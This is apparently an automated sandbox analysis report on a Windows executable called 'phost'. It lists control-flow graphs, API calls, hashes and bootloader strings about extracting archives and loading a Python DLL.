                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
                                                                                                                                                                                                                              • Instruction ID: d1bf3a5b8814cd65c2a3c458666f3e6fd8a579b5481355c22a6bd59ee45c8523
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B141BD32B0868295EF11DB299C105BA63B4FF447E8F448532ED0D8BB99DE3CE50AD702

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 528 7ff62cc71210-7ff62cc7126d call 7ff62cc7bdf0 531 7ff62cc71297-7ff62cc712af call 7ff62cc84fb4 528->531 532 7ff62cc7126f-7ff62cc71296 call 7ff62cc72710 528->532 537 7ff62cc712d4-7ff62cc712e4 call 7ff62cc84fb4 531->537 538 7ff62cc712b1-7ff62cc712cf call 7ff62cc84f78 call 7ff62cc72910 531->538 544 7ff62cc71309-7ff62cc7131b 537->544 545 7ff62cc712e6-7ff62cc71304 call 7ff62cc84f78 call 7ff62cc72910 537->545 549 7ff62cc71439-7ff62cc7146d call 7ff62cc7bad0 call 7ff62cc84fa0 * 2 538->549 548 7ff62cc71320-7ff62cc7133d call 7ff62cc8040c 544->548 545->549 554 7ff62cc71342-7ff62cc71345 548->554 557 7ff62cc7134b-7ff62cc71355 call 7ff62cc80180 554->557 558 7ff62cc71431 554->558 557->558 564 7ff62cc7135b-7ff62cc71367 557->564 558->549 566 7ff62cc71370-7ff62cc71398 call 7ff62cc7a230 564->566 569 7ff62cc7139a-7ff62cc7139d 566->569 570 7ff62cc71416-7ff62cc7142c call 7ff62cc72710 566->570 571 7ff62cc71411 569->571 572 7ff62cc7139f-7ff62cc713a9 569->572 570->558 571->570 574 7ff62cc713ab-7ff62cc713c1 call 7ff62cc80b4c 572->574 575 7ff62cc713d4-7ff62cc713d7 572->575 585 7ff62cc713c3-7ff62cc713cd call 7ff62cc80180 574->585 586 7ff62cc713cf-7ff62cc713d2 574->586 577 7ff62cc713ea-7ff62cc713ef 575->577 578 7ff62cc713d9-7ff62cc713e7 call 7ff62cc99ea0 575->578 577->566 580 7ff62cc713f5-7ff62cc713f8 577->580 578->577 583 7ff62cc7140c-7ff62cc7140f 580->583 584 7ff62cc713fa-7ff62cc713fd 580->584 583->558 584->570 587 7ff62cc713ff-7ff62cc71407 584->587 585->577 585->586 586->570 587->548
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
                                                                                                                                                                                                                              • Instruction ID: 6de156a15c2040317328a8afe42b7c9599c13c37742a4f841dc13d74ec64d578
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C851D832B0864285EE619B19AC503BA62B5FF85BB4F444235ED4DCBBC9DE3CE509D701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72C50: MessageBoxW.USER32 ref: 00007FF62CC72D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction ID: b956c5c0559a42c694c9bc162a435fcaa0ce6a7cf8795c578b551813880ac6c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821A7A1F1CA4291FE20972CEC553B62274FF883B8F844136E55DCA5D5EE2CE509D302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 689 7ff62cc8bacc-7ff62cc8baf2 690 7ff62cc8baf4-7ff62cc8bb08 call 7ff62cc84f58 call 7ff62cc84f78 689->690 691 7ff62cc8bb0d-7ff62cc8bb11 689->691 707 7ff62cc8befe 690->707 693 7ff62cc8bee7-7ff62cc8bef3 call 7ff62cc84f58 call 7ff62cc84f78 691->693 694 7ff62cc8bb17-7ff62cc8bb1e 691->694 713 7ff62cc8bef9 _invalid_parameter_noinfo 693->713 694->693 697 7ff62cc8bb24-7ff62cc8bb52 694->697 697->693 700 7ff62cc8bb58-7ff62cc8bb5f 697->700 703 7ff62cc8bb61-7ff62cc8bb73 call 7ff62cc84f58 call 7ff62cc84f78 700->703 704 7ff62cc8bb78-7ff62cc8bb7b 700->704 703->713 705 7ff62cc8bb81-7ff62cc8bb87 704->705 706 7ff62cc8bee3-7ff62cc8bee5 704->706 705->706 712 7ff62cc8bb8d-7ff62cc8bb90 705->712 711 7ff62cc8bf01-7ff62cc8bf18 706->711 707->711 712->703 715 7ff62cc8bb92-7ff62cc8bbb7 712->715 713->707 717 7ff62cc8bbb9-7ff62cc8bbbb 715->717 718 7ff62cc8bbea-7ff62cc8bbf1 715->718 721 7ff62cc8bbe2-7ff62cc8bbe8 717->721 722 7ff62cc8bbbd-7ff62cc8bbc4 717->722 719 7ff62cc8bbf3-7ff62cc8bbff call 7ff62cc8d66c 718->719 720 7ff62cc8bbc6-7ff62cc8bbdd call 7ff62cc84f58 call 7ff62cc84f78 _invalid_parameter_noinfo 718->720 728 7ff62cc8bc04-7ff62cc8bc1b call 7ff62cc8a9b8 * 2 719->728 742 7ff62cc8bd70 720->742 725 7ff62cc8bc68-7ff62cc8bc7f 721->725 722->720 722->721 726 7ff62cc8bc81-7ff62cc8bc89 725->726 727 7ff62cc8bcfa-7ff62cc8bd04 call 7ff62cc9398c 725->727 726->727 730 7ff62cc8bc8b-7ff62cc8bc8d 726->730 740 7ff62cc8bd8e 727->740 741 7ff62cc8bd0a-7ff62cc8bd1f 727->741 750 7ff62cc8bc38-7ff62cc8bc63 call 7ff62cc8c2f4 728->750 751 7ff62cc8bc1d-7ff62cc8bc33 call 7ff62cc84f78 call 7ff62cc84f58 728->751 730->727 734 7ff62cc8bc8f-7ff62cc8bca5 730->734 734->727 738 7ff62cc8bca7-7ff62cc8bcb3 734->738 738->727 743 7ff62cc8bcb5-7ff62cc8bcb7 738->743 746 7ff62cc8bd93-7ff62cc8bdb3 ReadFile 740->746 741->740 747 7ff62cc8bd21-7ff62cc8bd33 GetConsoleMode 741->747 744 7ff62cc8bd73-7ff62cc8bd7d call 7ff62cc8a9b8 742->744 743->727 748 7ff62cc8bcb9-7ff62cc8bcd1 743->748 744->711 752 7ff62cc8bdb9-7ff62cc8bdc1 746->752 753 7ff62cc8bead-7ff62cc8beb6 GetLastError 746->753 747->740 754 7ff62cc8bd35-7ff62cc8bd3d 747->754 748->727 757 7ff62cc8bcd3-7ff62cc8bcdf 748->757 750->725 751->742 752->753 760 7ff62cc8bdc7 752->760 755 7ff62cc8bed3-7ff62cc8bed6 753->755 756 7ff62cc8beb8-7ff62cc8bece call 7ff62cc84f78 call 7ff62cc84f58 753->756 754->746 762 7ff62cc8bd3f-7ff62cc8bd61 ReadConsoleW 754->762 767 7ff62cc8bd69-7ff62cc8bd6b call 7ff62cc84eec 755->767 768 7ff62cc8bedc-7ff62cc8bede 755->768 756->742 757->727 766 7ff62cc8bce1-7ff62cc8bce3 757->766 770 7ff62cc8bdce-7ff62cc8bde3 760->770 763 7ff62cc8bd82-7ff62cc8bd8c 762->763 764 7ff62cc8bd63 GetLastError 762->764 763->770 764->767 766->727 774 7ff62cc8bce5-7ff62cc8bcf5 766->774 767->742 768->744 770->744 776 7ff62cc8bde5-7ff62cc8bdf0 770->776 774->727 779 7ff62cc8bdf2-7ff62cc8be0b call 7ff62cc8b6e4 776->779 780 7ff62cc8be17-7ff62cc8be1f 776->780 785 7ff62cc8be10-7ff62cc8be12 779->785 781 7ff62cc8be21-7ff62cc8be33 780->781 782 7ff62cc8be9b-7ff62cc8bea8 call 7ff62cc8b524 780->782 786 7ff62cc8be8e-7ff62cc8be96 781->786 787 7ff62cc8be35 781->787 782->785 785->744 786->744 790 7ff62cc8be3a-7ff62cc8be41 787->790 791 7ff62cc8be43-7ff62cc8be47 790->791 792 7ff62cc8be7d-7ff62cc8be88 790->792 793 7ff62cc8be63 791->793 794 7ff62cc8be49-7ff62cc8be50 791->794 792->786 796 7ff62cc8be69-7ff62cc8be79 793->796 794->793 795 7ff62cc8be52-7ff62cc8be56 794->795 795->793 797 7ff62cc8be58-7ff62cc8be61 795->797 796->790 798 7ff62cc8be7b 796->798 797->796 798->786
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                              • Instruction ID: 7c077e2aff5f63cf7d231dc390abb066b8caf8f986de67185a38806eb2660584
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAC1C432B0C68695EF628B199C60ABF6770EB81BE0F554235EA4D83795CF7CE8458312

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction ID: f7066f966b33c59090be11c9848da9ef106e25ef8a964541b0c85e258afc640f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42419331B18A87D1EE11EB28EC141F96379FB443A4F804132EA5C8B695EF3CE519D742

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction ID: 271a94c00b644a4ab053a53586846c446c36e41e32e8fdcb754450a43629838b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B941A222F2878283FB11CB64995077A6271FB957B4F109335EA5C83AD6DFBCA5E08701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction ID: 8b79717dbfe36037813a08f35e9a0aef6439a820653bdf8024acb8f381f60797
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95315920F08A5346FE24AB2CDD253B916B9EF517A4F444434E54ECF2D7DE2CA409E253

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 958 7ff62cc801ac-7ff62cc801d9 959 7ff62cc801db-7ff62cc801de 958->959 960 7ff62cc801f5 958->960 959->960 962 7ff62cc801e0-7ff62cc801e3 959->962 961 7ff62cc801f7-7ff62cc8020b 960->961 963 7ff62cc8020c-7ff62cc8020f 962->963 964 7ff62cc801e5-7ff62cc801ea call 7ff62cc84f78 962->964 965 7ff62cc80211-7ff62cc8021d 963->965 966 7ff62cc8021f-7ff62cc80223 963->966 972 7ff62cc801f0 _invalid_parameter_noinfo 964->972 965->966 968 7ff62cc8024a-7ff62cc80253 965->968 969 7ff62cc80237-7ff62cc8023a 966->969 970 7ff62cc80225-7ff62cc8022f call 7ff62cc9a540 966->970 975 7ff62cc8025a 968->975 976 7ff62cc80255-7ff62cc80258 968->976 969->964 974 7ff62cc8023c-7ff62cc80248 969->974 970->969 972->960 974->964 974->968 978 7ff62cc8025f-7ff62cc8027e 975->978 976->978 979 7ff62cc803c5-7ff62cc803c8 978->979 980 7ff62cc80284-7ff62cc80292 978->980 979->961 981 7ff62cc8030a-7ff62cc8030f 980->981 982 7ff62cc80294-7ff62cc8029b 980->982 983 7ff62cc8037c-7ff62cc8037f call 7ff62cc8bf1c 981->983 984 7ff62cc80311-7ff62cc8031d 981->984 982->981 985 7ff62cc8029d 982->985 995 7ff62cc80384-7ff62cc80387 983->995 986 7ff62cc80329-7ff62cc8032f 984->986 987 7ff62cc8031f-7ff62cc80326 984->987 988 7ff62cc802a3-7ff62cc802ad 985->988 989 7ff62cc803f0 985->989 991 7ff62cc803cd-7ff62cc803d1 986->991 993 7ff62cc80335-7ff62cc80352 call 7ff62cc8a4ec call 7ff62cc8bacc 986->993 987->986 988->991 992 7ff62cc802b3-7ff62cc802b9 988->992 994 7ff62cc803f5-7ff62cc80400 989->994 996 7ff62cc803d3-7ff62cc803db call 7ff62cc9a540 991->996 997 7ff62cc803e0-7ff62cc803eb call 7ff62cc84f78 991->997 998 7ff62cc802bb-7ff62cc802be 992->998 999 7ff62cc802f1-7ff62cc80305 992->999 1016 7ff62cc80357-7ff62cc80359 993->1016 994->961 995->994 1001 7ff62cc80389-7ff62cc8038c 995->1001 996->997 997->972 1004 7ff62cc802dc-7ff62cc802e7 call 7ff62cc84f78 _invalid_parameter_noinfo 998->1004 1005 7ff62cc802c0-7ff62cc802c6 998->1005 1002 7ff62cc803ac-7ff62cc803b7 999->1002 1001->991 1008 7ff62cc8038e-7ff62cc803a5 1001->1008 1002->980 1009 7ff62cc803bd 1002->1009 1022 7ff62cc802ec 1004->1022 1010 7ff62cc802c8-7ff62cc802d0 call 7ff62cc99ea0 1005->1010 1011 7ff62cc802d2-7ff62cc802d7 call 7ff62cc9a540 1005->1011 1008->1002 1009->979 1010->1022 1011->1004 1020 7ff62cc80405-7ff62cc8040a 1016->1020 1021 7ff62cc8035f 1016->1021 1020->994 1021->989 1023 7ff62cc80365-7ff62cc8037a 1021->1023 1022->999 1023->1002
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: bea6f2979c97292ab5e279b5dbc5d2ad7b6025bd81adf42ae9bfc8ac724a672c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B51B461B0964286FF6A9A6D9C00E7B62A1AF44BF4F148734DE6DC77C5CF3CE4018642

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction ID: 9ee7cf53e83f83ff636c49a0e447475e1a33ff4bcac3591da54af4149936f7ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C119171718A8181DE618B29EC5416A6371BB85BF4F544331EE7D8B7E9CE7CD0518701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
